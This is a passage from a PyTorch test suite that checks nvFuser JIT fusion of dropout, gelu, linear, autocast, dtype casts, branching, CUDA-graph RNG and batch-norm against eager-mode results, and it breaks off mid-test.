self.assertEqual(o, jit_o)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_grad_sum_to_size(self):
dtype = torch.float
device = "cuda"
x = torch.randn([2, 4, 4], dtype=dtype, device=device).requires_grad_()
y = torch.randn([4], dtype=dtype, device=device).requires_grad_()
grad = torch.randn([2, 4, 4], dtype=dtype, device=device)
ref_x = x.detach().clone().requires_grad_()
ref_y = y.detach().clone().requires_grad_()
def t(x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.relu(o)
return o
# profiling runs for forward & backward
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o.backward(grad)
jit_o = t_jit(x, y)
jit_o.backward(grad)
x.grad = None
y.grad = None
jit_o = t_jit(x, y)
jit_o.backward(grad)
o = t(ref_x, ref_y)
o.backward(grad)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(x.grad, ref_x.grad)
self.assertEqual(y.grad, ref_y.grad)
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GUARD).run(bwd_graph)
# update shape: old kernel should handle dynamic shape well without
# recompilation
x = torch.randn([2, 5, 8], dtype=dtype, device=device).requires_grad_()
y = torch.randn([8], dtype=dtype, device=device).requires_grad_()
ref_x = x.detach().clone().requires_grad_()
ref_y = y.detach().clone().requires_grad_()
grad = torch.randn([2, 5, 8], dtype=dtype, device=device)
jit_o = t_jit(x, y)
# (TODO) check executed kernel, should extend autograd.profiler to fused
# kernels
jit_o.backward(grad)
o = t(ref_x, ref_y)
o.backward(grad)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertEqual(x.grad, ref_x.grad)
self.assertEqual(y.grad, ref_y.grad)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_inference_fusion(self):
dtype = torch.float
device = "cuda"
x = torch.randn([10, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o + 1.0
return o
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, 0.15, False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_train_nograd_fusion(self):
dtype = torch.float
device = "cuda"
x = torch.randn([10, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o + 1.0
return o
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, 0.0, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_train_nograd_prob_check(self):
dtype = torch.float
device = "cuda"
x = torch.randn([1024, 1024], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
for prob in [0.0, 0.15, 0.5, 0.85, 1.]:
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
self.assertTrue(jit_o.detach().isfinite().all().item())
num_elems = x.numel()
num_zeros = num_elems - jit_o.detach().count_nonzero().item()
percent_zeros = num_zeros / num_elems
self.assertTrue((percent_zeros >= (prob - 0.01)) and (percent_zeros <= (prob + 0.01)))
self.assertGraphContainsExactly(t_jit.graph_for(x, prob, True), FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_training_fusion(self):
dtype = torch.float
device = "cuda"
x = torch.randn([10, 4, 8], dtype=dtype, device=device, requires_grad=True)
grads = torch.randn([10, 4, 8], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
# The drop probability needs to be set to zero because eager mode and
# the jit draw random numbers in a different order
self._run_training_helper(t_jit, t, grads, x, 0.0, True)
def t2(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.softmax(x, dim=-1)
o = torch.nn.functional.dropout(o, p, training=train)
return o
t2_jit = torch.jit.script(t2)
# The drop probability needs to be set to zero because eager mode and
# the jit draw random numbers in a different order
self._run_training_helper(t2_jit, t2, grads, x, 0.0, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_gelu(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
dtype = torch.float
device = "cuda"
x = torch.randn([1024, 1024], dtype=dtype, device=device, requires_grad=True)
grads = torch.randn([1024, 1024], dtype=dtype, device=device, requires_grad=False)
def t(x: torch.Tensor, mode : str):
o = torch.nn.functional.gelu(x, approximate=mode)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
self._run_training_helper(t_jit, t, grads, x, 'none')
self._run_training_helper(t_jit, t, grads, x, 'tanh')
torch._C._jit_set_nvfuser_guard_mode(old_guard)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_dropout_training_prob_check(self):
dtype = torch.float
device = "cuda"
x = torch.randn([1024, 1024], dtype=dtype, device=device, requires_grad=True)
x_nograd = torch.randn([1024, 1024], dtype=dtype, device=device)
def t(x: torch.Tensor, p: float, train: bool):
o = torch.nn.functional.dropout(x, p, training=train)
o = o * 2.0
return o
t_jit = torch.jit.script(t)
for prob in [0.0, 0.15, 0.5, 0.85, 1.]:
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
torch.cuda.manual_seed_all(123)
jit_o = t_jit(x, prob, True)
self.assertTrue(jit_o.detach().isfinite().all().item())
num_elems = x.numel()
num_zeros = num_elems - jit_o.detach().count_nonzero().item()
percent_zeros = num_zeros / num_elems
self.assertTrue((percent_zeros >= (prob - 0.01)) and (percent_zeros <= (prob + 0.01)))
self.assertGraphContainsExactly(t_jit.graph_for(x, prob, True), FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_linear(self):
in_feature = 2
out_feature = 8
# Changing the input dims to be 3-D to avoid eager mode bias fusion
# The bias fusion causes some precision issues with TF-32
x = torch.randn(2, 4, in_feature, dtype=torch.float32, device='cuda')
weight = torch.randn(out_feature, in_feature, dtype=torch.float32, device='cuda')
bias = torch.randn(out_feature, dtype=torch.float32, device='cuda')
def t(x: torch.Tensor, weight: torch.Tensor, bias: torch.Tensor):
o = torch.nn.functional.linear(x, weight, bias)
o = torch.relu(o)
return o
# bias set to true.
t_jit = torch.jit.script(t)
jit_o = t_jit(x, weight, bias)
jit_o = t_jit(x, weight, bias)
o = t(x, weight, bias)
self.assertEqual(o, jit_o)
# the optimized graph should contain exactly one fusion group
self.assertGraphContainsExactly(t_jit.graph_for(x, weight, bias), FUSION_GUARD, 1)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_linear_symbolic_shapes(self):
def fn(x: int):
y = torch.zeros((x, x + 2)).cuda()
for i in range(2):
inp = torch.rand((x, x + i)).cuda()
weight = torch.rand((x + 2, x + i)).cuda()
bias = torch.rand((x, x + 2)).cuda()
y += torch.sin(torch.nn.functional.linear(inp, weight, bias))
return y
fn_s = torch.jit.script(fn)
fn_s(5)
fn_s(5)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_backward_type(self):
# not super useful to check gradient of integer/bool, so skipping here
type_pairs = [
(torch.float, torch.half),
(torch.double, torch.half),
(torch.float, torch.double),
]
if TEST_BF16:
type_pairs += [
(torch.float, torch.bfloat16),
(torch.double, torch.bfloat16),
]
for x_type, y_type in type_pairs:
x = torch.randn(4, 2, dtype=x_type, device='cuda', requires_grad=True)
y = torch.randn(4, 2, dtype=y_type, device='cuda', requires_grad=True)
grad = torch.randn(4, 2, dtype=torch.float, device='cuda')
def test1(x: torch.Tensor, y: torch.Tensor):
o = torch.add(x, y)
o = torch.add(o, y)
o = torch.add(o, y)
o = torch.add(o, y)
o = o + 1.0
return o
test1_jit = torch.jit.script(test1)
for i in range(3):
jit_o = test1_jit(x, y)
jit_o.backward(grad)
bwd_graph = list(
list(test1_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(x.grad.dtype, x.dtype)
self.assertEqual(y.grad.dtype, y.dtype)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_autocast_1(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = x * 2.0
o = torch.softmax(o, dim=-1)
o = o * 3.0
o = torch._C._nn.linear(o, y)
return o
x = torch.randn(8, 4, dtype=torch.half, device='cuda', requires_grad=True)
y = torch.randn(4, 4, dtype=torch.float, device='cuda', requires_grad=True)
grad = torch.randn(8, 4, dtype=torch.half, device='cuda', requires_grad=False)
t_jit = torch.jit.script(t)
for i in range(3):
with torch.cuda.amp.autocast():
jit_o = t_jit(x, y)
if i == 2 :
fwd_graph = t_jit.graph_for(x, y)
jit_o.backward(grad)
self.assertGraphContainsExactly(fwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
with torch.cuda.amp.autocast():
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(jit_o.dtype, torch.half)
self.assertEqual(x.grad.dtype, x.dtype)
self.assertEqual(y.grad.dtype, y.dtype)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_autocast_2(self):
def t(x: torch.Tensor):
o = x * 2.0
o = torch.softmax(o, dim=-1)
o = o * 3.0
o = torch.softmax(o, dim=-1)
o = o * 4.0
return o
x = torch.randn(8, 4, dtype=torch.half, device='cuda', requires_grad=True)
grad = torch.randn(8, 4, dtype=torch.float, device='cuda', requires_grad=False)
t_jit = torch.jit.script(t)
for i in range(3):
with torch.cuda.amp.autocast():
jit_o = t_jit(x)
if i == 2:
fwd_graph = t_jit.graph_for(x)
jit_o.backward(grad)
self.assertGraphContainsExactly(fwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
with torch.cuda.amp.autocast():
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(jit_o.dtype, torch.float)
self.assertEqual(x.grad.dtype, x.dtype)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_autocast_1_bfloat(self):
def t(x: torch.Tensor, y: torch.Tensor):
o = x * 2.0
o = torch.softmax(o, dim=-1)
o = o * 3.0
o = torch._C._nn.linear(o, y)
return o
x = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda', requires_grad=True)
y = torch.randn(4, 4, dtype=torch.float, device='cuda', requires_grad=True)
grad = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda', requires_grad=False)
t_jit = torch.jit.script(t)
for i in range(3):
with torch.cuda.amp.autocast(dtype=torch.bfloat16):
jit_o = t_jit(x, y)
if i == 2:
fwd_graph = t_jit.graph_for(x, y)
jit_o.backward(grad)
self.assertGraphContainsExactly(fwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
with torch.cuda.amp.autocast(dtype=torch.bfloat16):
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(jit_o.dtype, torch.bfloat16)
self.assertEqual(x.grad.dtype, x.dtype)
self.assertEqual(y.grad.dtype, y.dtype)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_autocast_2_bfloat(self):
def t(x: torch.Tensor):
o = x * 2.0
o = torch.softmax(o, dim=-1)
o = o * 3.0
o = torch.softmax(o, dim=-1)
o = o * 4.0
return o
x = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda', requires_grad=True)
grad = torch.randn(8, 4, dtype=torch.float, device='cuda', requires_grad=False)
t_jit = torch.jit.script(t)
for i in range(3):
with torch.cuda.amp.autocast(dtype=torch.bfloat16):
jit_o = t_jit(x)
if i == 2:
fwd_graph = t_jit.graph_for(x)
jit_o.backward(grad)
self.assertGraphContainsExactly(fwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
with torch.cuda.amp.autocast(dtype=torch.bfloat16):
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
FileCheck().check(FUSION_GROUP).run(bwd_graph)
self.assertEqual(jit_o.dtype, torch.float)
self.assertEqual(x.grad.dtype, x.dtype)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_to_dtype_fp32_to_fp16(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.half)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.float, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.half)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_to_dtype_fp16_to_fp32(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.float)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.half, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.float)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_to_dtype_fp16_to_fp16(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.half)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.half, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.half)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_to_dtype_fp32_to_bf16(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.bfloat16)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.float, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.bfloat16)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_to_dtype_bf16_to_fp32(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.float)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.float)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
def test_to_dtype_bf16_to_bf16(self):
def t(x: torch.Tensor):
o = x * 2.0
o = o.to(dtype=torch.bfloat16)
o = o * 3.0
return o
x = torch.randn(8, 4, dtype=torch.bfloat16, device='cuda')
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
self.assertEqual(jit_o.dtype, torch.bfloat16)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(not TEST_MULTIGPU, "requires multiple CUDA device")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_multiple_device_pw(self):
def t(x):
o = x + 1.0
o = torch.relu(o)
return o
x = torch.randn(2, dtype=torch.float32, device="cuda")
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x)
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
# note: a bare `torch.cuda.device(1)` call is a no-op; the explicit
# `.to("cuda:1")` below is what actually moves the input to the second device
x = x.to("cuda:1")
jit_o = t_jit(x)
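# The next test, as its name suggests, profiles only the flag=False branch
# before taking the flag=True branch once, checking that graph_for still
# reports a single fusion guard for a branch that has barely been profiled.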
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_graph_for_with_missing_optimized_engine(self):
x = torch.randn(8, 4, 2, dtype=torch.float, device="cuda").requires_grad_()
def t(x: torch.Tensor, flag: bool):
x = x + 1.0
x = torch.relu(x)
if flag:
o = x + 1.0
o = torch.relu(o)
else:
o = x + 2.0
o = torch.relu(o)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, False)
jit_o = t_jit(x, False)
jit_o = t_jit(x, True)
o = t(x, True)
self.assertEqual(o, jit_o)
# the flag=True branch was just taken; its optimized graph should still
# contain exactly one fusion guard (searching subgraphs)
self.assertGraphContainsExactly(t_jit.graph_for(x, True), FUSION_GUARD, 1, True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_branches(self):
in_feature = 2
out_feature = 4
x = torch.randn(4, in_feature, dtype=torch.float32, device='cuda')
weight = torch.randn(out_feature, in_feature, dtype=torch.float32, device='cuda')
bias = torch.randn(out_feature, dtype=torch.float32, device='cuda')
def t(x: torch.Tensor, weight: torch.Tensor, bias: torch.Tensor, flag: bool):
if flag:
o = torch.nn.functional.linear(x, weight, bias)
o = o + 1.0
o = torch.relu(o)
else:
o = x.sum()
o = o + 2.0
o = torch.relu(o)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, weight, bias, True)
jit_o = t_jit(x, weight, bias, True)
o = t(x, weight, bias, True)
self.assertEqual(o, jit_o)
# the taken (flag=True) branch should be covered by exactly one fusion guard
self.assertGraphContainsExactly(t_jit.graph_for(x, weight, bias, True), FUSION_GUARD, 1)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_scalar_tensor(self):
x = torch.empty([], device="cuda", dtype=torch.float32)
def t(x: torch.Tensor):
o = x + 1.0
o = torch.nn.functional.relu(o)
return o
# two warm-up runs before checking the optimized graph
t_jit = torch.jit.script(t)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o, jit_o)
# the add + relu should have been fused under a single fusion guard
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1)
@unittest.skipIf(os.environ.get('PYTORCH_NO_CUDA_MEMORY_CACHING') is not None,
"skipping graph_rng when caching allocator is disabled")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(CUDA_MAJOR < 11, "requires CUDA11 or above")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_graph_rng(self):
self.assertTrue(torch._C._jit_nvfuser_enabled())
size = 10000
a = torch.randn((size,), device="cuda", dtype=torch.float)
def t(x):
o = x + 1.0
o = torch.nn.functional.dropout(o, p=0.1)
o = o + 1.0
o = torch.nn.functional.dropout(o, p=0.1)
return o
t_jit = torch.jit.script(t)
for _ in range(3):
t_jit(a)
self.assertGraphContainsExactly(t_jit.graph_for(a), FUSION_GUARD, 1)
# Control (jitted, ungraphed)
torch.cuda.manual_seed(5)
eager_out = a.clone()
for _ in range(3):
eager_out = t_jit(eager_out)
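# Graphed run: capture a single invocation of t_jit into a CUDA graph.
# Capture has to happen on a non-default stream, hence the side stream that
# is synchronized with the current stream before and after capture.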
graph_in = a.clone()
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
torch.cuda.manual_seed(5)
g.capture_begin()
graph_out = t_jit(graph_in)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
# g is now a jitted, graphed version of t.
# Runs a (jitted, graphed) -> (jitted, ungraphed) -> (jitted, graphed) sequence.
# The ops in the overall sequence should be the same as Control.
g.replay()
# graph_out is now filled with g's result. Use it as ungraphed input.
out = t_jit(graph_out)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out should now equal eager_out
self.assertEqual(graph_out, eager_out)
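# Shared helper for the batch-norm tests below: it builds a scripted module
# and an identical eager reference, runs a few profiling iterations, resets
# running stats and accumulated grads, then does one final run and compares
# outputs, input grads, affine grads and running stats within
# dtype-dependent tolerances, while asserting that both the forward and the
# backward graph contain exactly one fusion guard.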
def _test_batch_norm_impl_index_helper(self, batch, c, hw, affine=True,
track_running_stats=True, train=True,
dtype=torch.float32):
# enabling inlining to avoid counter increment in BN forward
torch._C._debug_set_autodiff_subgraph_inlining(True)
class MyModule(torch.nn.Module):
def __init__(self, num_features=10, affine=True, track_running_stats=True):
super(MyModule, self).__init__()
self.bn = torch.nn.BatchNorm2d(num_features,
1e-5,
affine=affine,
track_running_stats=track_running_stats).to(dtype=dtype)
def forward(self, x):
o = self.bn(x)
o = o * 2.0
return o
x = torch.randn(batch, c, hw, hw, dtype=torch.float, device="cuda").to(dtype=dtype).requires_grad_()
grad = torch.randint(-20, 20, (batch, c, hw, hw), device="cuda").to(dtype=dtype).div(-10)
my_module = MyModule(c, affine, track_running_stats).cuda()
ref_module = MyModule(c, affine, track_running_stats).cuda()
if not train:
my_module.eval()
ref_module.eval()
t_jit = torch.jit.script(my_module)
ref_module.load_state_dict(my_module.state_dict())
ref_x = x.detach().requires_grad_()
for i in range(0, 3):
jit_o = t_jit(x)
jit_o.backward(grad)
# TODO: remove this run?
o = ref_module(ref_x)
o.backward(grad)
has_affine = ref_module.bn.weight is not None
has_running_stats = ref_module.bn.running_mean is not None
if has_running_stats:
my_module.bn.running_mean.zero_()
my_module.bn.running_var.fill_(1.0)
ref_module.bn.running_mean.zero_()
ref_module.bn.running_var.fill_(1.0)
# Verify that when train is False, we don't have grad for weight/bias.
if has_affine and train:
my_module.bn.weight.grad.zero_()
my_module.bn.bias.grad.zero_()
ref_module.bn.weight.grad.zero_()
ref_module.bn.bias.grad.zero_()
x.grad.zero_()
ref_x.grad.zero_()
# real runs
jit_o = t_jit(x)
jit_o.backward(grad)
o = ref_module(ref_x)
o.backward(grad)
# assert forward graph fusion
self.assertGraphContainsExactly(t_jit.graph_for(x), FUSION_GUARD, 1, consider_subgraphs=True)
# assert backward graph fusion
bwd_graph = list(
list(t_jit.get_debug_state().execution_plans.values())[0].code.grad_executor_states()[0]
.execution_plans.values())[0].graph
self.assertGraphContainsExactly(bwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
e0 = 1e-5 if dtype is not torch.half else 1e-3
e1 = 1e-4 if dtype is not torch.half else 1e-3
e2 = 1e-3 if dtype is not torch.half else 1e-2
self.assertTrue(self._compare("comparing output failed", jit_o, o, e0))
self.assertTrue(self._compare("comparing input grad failed", x.grad, ref_x.grad, e1))
# TODO: switch to welford and reduce this to 1e-5
# The 1e-3 tolerance looks bad, but without Welford in codegen the numerics
# differ noticeably between the reference and the generated kernel.
if has_affine and train:
self.assertTrue(self._compare("comparing weight grad failed",
my_module.bn.weight.grad,
ref_module.bn.weight.grad,
e2))
self.assertTrue(self._compare("comparing bias grad failed",
my_module.bn.bias.grad,
ref_module.bn.bias.grad,
e1))
if has_running_stats:
self.assertTrue(self._compare("comparing running_mean failed",
my_module.bn.running_mean,
ref_module.bn.running_mean,
e0))
self.assertTrue(self._compare("comparing running_var failed",
my_module.bn.running_var,
ref_module.bn.running_var,
e0))
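# The batch-norm tests below push different configurations through the
# helper above: the half-precision variant sweeps (training,
# track_running_stats, affine) combinations with looser tolerances, the
# "inner_bcast" case covers the degenerate 1x1 spatial shape, and the
# correctness test sweeps a grid of batch/channel/spatial sizes.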
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_batch_norm_half(self):
with torch.backends.cudnn.flags(enabled=True):
setups = [
[True, True],
[False, False],
[True, False],
[False, True]]
for training_and_track, affine in itertools.product(setups, [True, False]):
training, track_running_stats = training_and_track
self._test_batch_norm_impl_index_helper(4, 8, 5, affine, track_running_stats, training, torch.half)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_batch_norm_impl_index_inner_bcast(self):
# the repro
self._test_batch_norm_impl_index_helper(2, 1, 1, False, True, True)
# running the full set
setups = [
[True, True],
[False, False],
[True, False],
[False, True]]
for training_and_track, affine in itertools.product(setups, [True, False]):
training, track_running_stats = training_and_track
self._test_batch_norm_impl_index_helper(2, 1, 1, affine, track_running_stats, training)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_batch_norm_impl_index_correctness(self):
with torch.backends.cudnn.flags(enabled=True):
batch = [2, 7, 16]
channels = [4, 89, 19, 32]
hw = [1, 8, 17, 32]
# avoid tolerance failure in CI
torch.cuda.manual_seed_all(211)
# failing sizes (2, 1, 1, 1)
# failing sizes (2, 89, 8, 8) training False, track True, affine: False
for b, c, hw in itertools.product(batch, channels, hw):
setups = [
[True, True],
[False, False],
[True, False],
[False, True]]
for training_and_track, affine in itertools.product(setups, [True, False]):
training, track_running_stats = training_and_track
self._test_batch_norm_impl_index_helper(b, c, hw, affine, track_running_stats, training)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_softplus_fuser(self):
def shifted_softplus(x: torch.Tensor, shift: float):
return functional.softplus(x) - shift
jitted = torch.jit.script(shifted_softplus)
inp = torch.randn(4, 2, dtype=torch.float32, device="cuda").requires_grad_()
inp_ref = inp.detach().clone().requires_grad_()
grad = torch.randn(4, 2, dtype=torch.float32, device="cuda")
aten_o = shifted_softplus(inp_ref, 0.693147)
aten_o.backward(grad)
aten_grad = inp_ref.grad
for i in range(3):
